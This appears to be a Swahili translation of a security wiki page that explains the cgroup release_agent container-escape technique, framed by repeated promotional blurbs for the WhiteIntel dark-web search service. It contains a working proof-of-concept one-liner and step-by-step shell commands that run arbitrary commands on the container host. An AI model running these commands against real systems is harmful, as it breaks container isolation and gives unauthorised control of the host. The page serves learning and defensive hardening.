WhiteIntel

WhiteIntel ni injini ya utaftaji inayotumia dark-web ambayo inatoa huduma za bure za kuangalia ikiwa kampuni au wateja wake wame vamiwa na malware za wizi.

Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.

Unaweza kutembelea tovuti yao na kujaribu injini yao bure kwa:

Kwa maelezo zaidi, tazama chapisho la blogi la asili. Hii ni muhtasari tu:

Poc ya Asili:

d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh
$1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o

Uthibitisho wa Mfano (PoC)

Uthibitisho wa mfano (PoC) unaonyesha njia ya kutumia cgroups kwa kujenga faili ya release_agent na kuzindua wito wake ili kutekeleza amri za kupindukia kwenye mwenyeji wa kontena. Hapa kuna maelezo ya hatua zinazohusika:

1. Andaa Mazingira:

   • Dhibiti /tmp/cgrp inayoundwa kutumika kama kituo cha mlima kwa cgroup.

   • Msimamizi wa cgroup wa RDMA unamiminiwa kwenye saraka hii. Katika kesi ya kutokuwepo kwa msimamizi wa RDMA, inashauriwa kutumia msimamizi wa cgroup wa memory kama mbadala.

mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

2. Wekeza Kikundi cha Mtoto:

• Kikundi cha mtoto kinachoitwa "x" kimeundwa ndani ya saraka ya kikundi iliyofungwa.

• Taarifa zimeanzishwa kwa kikundi cha "x" kwa kuandika 1 kwenye faili yake ya notify_on_release.

echo 1 > /tmp/cgrp/x/notify_on_release

3. Sanidi Msimamizi wa Kutolewa:

• Njia ya chombo kwenye mwenyeji inapatikana kutoka kwa faili ya /etc/mtab.

• Faili ya release_agent ya cgroup kisha inasanidiwa kutekeleza script iliyoitwa /cmd iliyoko kwenye njia ya mwenyeji iliyopatikana.

host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

4. Unda na Sanidi Skripti ya /cmd:

• Skripti ya /cmd inaundwa ndani ya chombo na kusanidiwa kutekeleza ps aux, ikielekeza matokeo kwenye faili iliyoitwa /output kwenye chombo. Njia kamili ya /output kwenye mwenyeji inatajwa.

echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd

5. Kuzindua Shambulizi:

• Mchakato unaanzishwa ndani ya cgroup ya mtoto "x" na mara moja unakomeshwa.

• Hii inazindua release_agent (script ya /cmd), ambayo inatekeleza ps aux kwenye mwenyeji na kuandika matokeo kwa /output ndani ya kontena.

sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

WhiteIntel

WhiteIntel ni injini ya utaftaji inayotumia dark-web ambayo inatoa huduma za bure za kuangalia ikiwa kampuni au wateja wake wameathiriwa na malware za kuiba.

Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.

Unaweza kutembelea tovuti yao na kujaribu injini yao kwa bure kwenye: